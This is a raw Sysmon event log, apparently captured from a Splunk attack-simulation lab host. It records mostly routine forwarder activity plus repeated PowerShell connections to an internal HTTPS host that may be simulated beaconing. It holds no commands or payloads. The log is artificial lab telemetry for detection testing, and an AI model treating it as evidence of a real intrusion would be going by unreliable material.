EventID=3 RecordID=36498797 UtcTime=2021-09-14 13:24:19.794 ProcessGuid={B81B27B7-401D-611D-6900-00000000C801} ProcessId=3616 Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe User=NT AUTHORITY\SYSTEM Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50690 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.12 DestinationHostname=- DestinationPort=8000 DestinationPortName=-
EventID=23 RecordID=36498796 UtcTime=2021-09-14 13:23:50.184 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=90099157B97A7B11D911D28BFE5277DE,SHA256=1336842E4C132831ACC947F4A6E5B84632D1B7962306B4BD2C435BC9976C1784,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=3 RecordID=36498800 UtcTime=2021-09-14 13:24:21.277 ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ProcessId=6940 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User=ATTACKRANGE\REED_SCHMIDT Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50691 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.16 DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal DestinationPort=443 DestinationPortName=https
EventID=23 RecordID=36498799 UtcTime=2021-09-14 13:23:51.198 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=E825777D92CFA6D6D0E4968E89B907BB,SHA256=5FCC734E058ECFA66F7C67439CD76CD23F67664070FD8BD1FC2C2B6C58BE40E9,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498801 UtcTime=2021-09-14 13:23:52.228 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=484E7A7D3CC3F79FA6445FEF0B41A6AE,SHA256=100BA9F30D7AC68491EF758104EF3F4C239256A75DB1D2DDAFAA88687A9F0F13,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498802 UtcTime=2021-09-14 13:23:53.244 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=2EB68CC3DD0ECBA82ADB4ACFA4E9EC97,SHA256=D7126047E92053D7FBAD200D55F50731604CEE787061A3E36F26C715E3AAB705,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498804 UtcTime=2021-09-14 13:23:54.610 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational Hashes=MD5=4805FFFB2DE09C3FE21ECC68B07E62BF,SHA256=E13E75B647314AD1D5DA4CF253AEF6854FF749EA5EFD563576E55EE176FEA61E,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498803 UtcTime=2021-09-14 13:23:54.295 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=06EF4F32DCDD34EC9234CF6BAAE189F8,SHA256=4D39A483797421CFB2EF0F886068139135457287B481A9322D62EB40806E3EBE,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=3 RecordID=36498807 UtcTime=2021-09-14 13:24:25.802 ProcessGuid={B81B27B7-401D-611D-6900-00000000C801} ProcessId=3616 Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe User=NT AUTHORITY\SYSTEM Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50693 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.12 DestinationHostname=- DestinationPort=8000 DestinationPortName=-
EventID=3 RecordID=36498806 UtcTime=2021-09-14 13:24:25.288 ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ProcessId=6940 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User=ATTACKRANGE\REED_SCHMIDT Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50692 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.16 DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal DestinationPort=443 DestinationPortName=https
EventID=23 RecordID=36498805 UtcTime=2021-09-14 13:23:55.310 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=BC5DFE5E6D98328EC0354C6CD27AE9F6,SHA256=7017F3D76B7D74C3502C40AA88E0CD4FA1BBEDF5124E607B42C633FAE6231B39,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498809 UtcTime=2021-09-14 13:23:56.342 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=92FB765E69466C078695668EF3504A2C,SHA256=15FA4441107BE6320DE94986C3C14DEC5B80D27926C46893C72CBBE45FAE2E5C,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498808 UtcTime=2021-09-14 13:23:56.324 ProcessGuid={B81B27B7-2BC4-612D-7CF4-01000000C801} ProcessId=4056 User=ATTACKRANGE\REED_SCHMIDT Image=C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe TargetFilename=C:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a38bb16.TMP Hashes=MD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498810 UtcTime=2021-09-14 13:23:57.360 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=BA26C46211A40FC2393E21C2AE66C802,SHA256=47F4D1BC543ACA2EEEC7EF5061052ACDF978061F5888F20F8D77F1FD0D7E49C3,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498812 UtcTime=2021-09-14 13:23:58.641 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational Hashes=MD5=C88BDB96046EB86508DE288F4D9BF82A,SHA256=4BE24DF061B76AC10123CAD8E52B324BE8BAC7849ED79ED4FBEAD8E84B6FC48C,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498811 UtcTime=2021-09-14 13:23:58.390 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=1836524F7E9178B4C4B64916D93F361F,SHA256=84D06CA0B3C36E9F9A694BC8D1E54EB69C955639866C9A6D5B43DCAA00D8EB68,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=3 RecordID=36498814 UtcTime=2021-09-14 13:24:29.299 ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ProcessId=6940 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User=ATTACKRANGE\REED_SCHMIDT Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50694 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.16 DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal DestinationPort=443 DestinationPortName=https
EventID=23 RecordID=36498813 UtcTime=2021-09-14 13:23:59.420 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=35EC39B5CB4B3E27B90F3C8D430CB137,SHA256=17854B425384386C37BF4391CE8BFE8268B87DD5428430A2870C51BAC5CB2029,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=3 RecordID=36498816 UtcTime=2021-09-14 13:24:30.813 ProcessGuid={B81B27B7-401D-611D-6900-00000000C801} ProcessId=3616 Image=C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe User=NT AUTHORITY\SYSTEM Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50695 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.12 DestinationHostname=- DestinationPort=8000 DestinationPortName=-
EventID=23 RecordID=36498815 UtcTime=2021-09-14 13:24:00.438 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=A8173105533EA94345B38E653092E28E,SHA256=B3780C905C929D5BC24DF273C348FB6C50FAD1BA57D2271B18EBD0629BE8A000,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498817 UtcTime=2021-09-14 13:24:01.486 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=4DD9C0FC2F854828079B7484704DD9BA,SHA256=02F34D8292EC17D49C38EF749A7CCF197B9D36EF13E651C1846B3F0521CA2F34,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498819 UtcTime=2021-09-14 13:24:02.838 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational Hashes=MD5=2E4ED5E1823BEFA2C581E2ABC27E07A4,SHA256=CF0927EDF7E1400E858C6E802224BF6089585CFF4122E40314816B2D9EA2CEFD,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498818 UtcTime=2021-09-14 13:24:02.618 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=894A3A13A98E45C9B3DC2256A6238689,SHA256=3ABE28EE71CEE9B0727A95E6DA0FB878E2EA84C4D422DAC274CA28356E51EEBB,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=3 RecordID=36498821 UtcTime=2021-09-14 13:24:33.311 ProcessGuid={B81B27B7-4822-613A-788F-03000000C801} ProcessId=6940 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe User=ATTACKRANGE\REED_SCHMIDT Protocol=tcp Initiated=true SourceIsIpv6=false SourceIp=10.0.1.15 SourceHostname=win-host-987.attackrange.local SourcePort=50696 SourcePortName=- DestinationIsIpv6=false DestinationIp=10.0.1.16 DestinationHostname=ip-10-0-1-16.us-west-2.compute.internal DestinationPort=443 DestinationPortName=https
EventID=23 RecordID=36498820 UtcTime=2021-09-14 13:24:03.635 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=57A5486B675FB5CAA647D3FAB1852106,SHA256=426C24314830E0CB50F7D3F8D1BCC4966829057F46539F6FDE65CBFEE363F163,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498822 UtcTime=2021-09-14 13:24:04.716 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=C2EA78A30D22BC973B78C0995AFE43BB,SHA256=12F8F211BB3FF6FE7FD05042A88068A3C3DB546621C14B1F86F00CDE1A0721B0,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498823 UtcTime=2021-09-14 13:24:05.733 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=2D66DDC1759DAB98CCA6DC3B7EEB77F0,SHA256=345B53C00EC5C0C405215B8FF842BFC81F1188AB90455C50D2893BF005B2CF59,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498824 UtcTime=2021-09-14 13:24:06.737 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=F3216E9B863DAFA41214D3DA0297DE23,SHA256=63D5D8571C8E9F2D65864E8F83A6F1D16B8AD365F322175810021921175B80C6,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=10 RecordID=36498833 UtcTime=2021-09-14 13:24:07.840 SourceProcessGUID={B81B27B7-4014-611D-3000-00000000C801} SourceProcessId=3144 SourceThreadId=3164 SourceImage=C:\Windows\system32\conhost.exe TargetProcessGUID={B81B27B7-A277-6140-BA56-04000000C801} TargetProcessId=1624 TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498832 UtcTime=2021-09-14 13:24:07.840 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498831 UtcTime=2021-09-14 13:24:07.840 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498830 UtcTime=2021-09-14 13:24:07.840 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498829 UtcTime=2021-09-14 13:24:07.840 SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} SourceProcessId=732 SourceThreadId=6156 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} TargetProcessId=1820 TargetImage=C:\Windows\sysmon64.exe GrantedAccess=0x1400 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36498828 UtcTime=2021-09-14 13:24:07.840 SourceProcessGUID={B81B27B7-4012-611D-0500-00000000C801} SourceProcessId=420 SourceThreadId=984 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={B81B27B7-A277-6140-BA56-04000000C801} TargetProcessId=1624 TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventID=10 RecordID=36498827 UtcTime=2021-09-14 13:24:07.840 SourceProcessGUID={B81B27B7-4013-611D-2700-00000000C801} SourceProcessId=2076 SourceThreadId=3760 SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe TargetProcessGUID={B81B27B7-A277-6140-BA56-04000000C801} TargetProcessId=1624 TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=1 RecordID=36498826 UtcTime=2021-09-14 13:24:07.835 ProcessGuid={B81B27B7-A277-6140-BA56-04000000C801} ProcessId=1624 Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe FileVersion=8.0.2 Description=Active Directory monitor Product=splunk Application Company=Splunk Inc. OriginalFileName=splunk-admon.exe CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe" CurrentDirectory=C:\Windows\system32\ User=NT AUTHORITY\SYSTEM LogonGuid={B81B27B7-4012-611D-E703-000000000000} LogonId=0x3e7 TerminalSessionId=0 IntegrityLevel=System Hashes=MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165 ParentProcessGuid={B81B27B7-4013-611D-2700-00000000C801} ParentProcessId=2076 ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
EventID=23 RecordID=36498825 UtcTime=2021-09-14 13:24:07.756 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=098F935C5F421837A4AD981D4BBFCD39,SHA256=885DC11D1085EEBE4EA7E6485AE1CEC08CB01B004099675ED3E981E78E2A3FC3,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498847 UtcTime=2021-09-14 13:24:08.855 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security Hashes=MD5=2148CAC7564CF1509B909AA52A39340F,SHA256=032D94F475A3DCAD0D1CC71E80FE04AAE59F90794846D2B895B7D65F553235BA,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498846 UtcTime=2021-09-14 13:24:08.855 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security Hashes=MD5=7C1710262484491B851809B0ECA6B70C,SHA256=44581F78C7ED7AC42EEEEA2D3D83886F0E1E035F3B34962E161093E3F6E2F316,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
EventID=23 RecordID=36498845 UtcTime=2021-09-14 13:24:08.786 ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ProcessId=2188 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=C5EAA80EFD364FC0DF3C75F6D0925762,SHA256=D0E262AD695D85C115592903B31E141490549168867884250191AE41B2963B68,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=false - insufficient disk space
